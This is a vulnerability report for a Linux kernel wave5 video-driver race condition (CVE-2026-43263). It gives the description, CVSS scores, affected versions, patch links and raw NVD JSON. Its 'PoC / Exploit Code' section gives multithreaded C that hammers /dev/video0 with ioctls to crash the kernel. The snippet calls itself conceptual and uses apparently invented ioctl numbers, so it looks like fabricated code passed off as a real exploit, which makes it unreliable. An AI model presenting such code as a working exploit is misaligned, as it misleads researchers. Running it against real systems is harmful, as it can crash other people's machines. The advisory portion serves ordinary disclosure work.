Security Vulnerability Report
CVE-2026-43263 CVSS 7.8 HIGH

CVE-2026-43263

Published: 2026-05-06 12:16:47
Last Modified: 2026-05-08 20:33:12
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

media: chips-media: wave5: Fix Null reference while testing fluster

When multi instances are created/destroyed, many interrupts happen and structures for decoder are removed. "struct vpu_instance" this structure is shared for all flow in the decoder, so if the structure is not protected by lock, Null dereference could happen sometimes. IRQ Handler was split to two phases and Lock was added as well.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

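cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.8 up to, but not including, 6.18.16) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.19 up to, but not including, 6.19.6) - VULNERABLE
Linux Kernel (versions before the fix patch was merged; see the Git commit history for details)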

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>

// Conceptual PoC for CVE-2026-43263
// Targets the race condition in wave5 driver instance management.
#define DEVICE_NODE "/dev/video0"
#define IOCTL_ALLOC_INSTANCE 0x8001
#define IOCTL_FREE_INSTANCE 0x8002

void* race_thread(void* arg) {
    int fd = open(DEVICE_NODE, O_RDWR);
    if (fd < 0) return NULL;
    for (int i = 0; i < 5000; i++) {
        // Rapidly create and destroy instances to trigger the race
        ioctl(fd, IOCTL_ALLOC_INSTANCE, NULL);
        ioctl(fd, IOCTL_FREE_INSTANCE, NULL);
    }
    close(fd);
    return NULL;
}

int main() {
    pthread_t t1, t2, t3;
    // Spawn multiple threads to increase contention on vpu_instance
    pthread_create(&t1, NULL, race_thread, NULL);
    pthread_create(&t2, NULL, race_thread, NULL);
    pthread_create(&t3, NULL, race_thread, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    pthread_join(t3, NULL);
    return 0;
}

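References

https://git.kernel.org/stable/c/d12bcf183ec7da4305d848068d15f18044eaf62a (Patch)
https://git.kernel.org/stable/c/e66ff2b08e4ee1c4d3b84f24818e5bcc178cc3a4 (Patch)
https://git.kernel.org/stable/c/ea316b784fe6a61b29131c98cddb24e651b1dcbc (Patch)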

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43263", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:47.257", "lastModified": "2026-05-08T20:33:12.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: chips-media: wave5: Fix Null reference while testing fluster\n\nWhen multi instances are created/destroyed, many interrupts happens\nand structures for decoder are removed.\n\"struct vpu_instance\" this structure is shared for all flow in the decoder,\nso if the structure is not protected by lock, Null dereference\ncould happens sometimes.\nIRQ Handler was spilt to two phases and Lock was added as well."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.8", "versionEndExcluding": "6.18.16", "matchCriteriaId": "12C05E5A-F731-4E9B-94E0-2E3F7FBA69A3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/d12bcf183ec7da4305d848068d15f18044eaf62a", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e66ff2b08e4ee1c4d3b84f24818e5bcc178cc3a4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ea316b784fe6a61b29131c98cddb24e651b1dcbc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}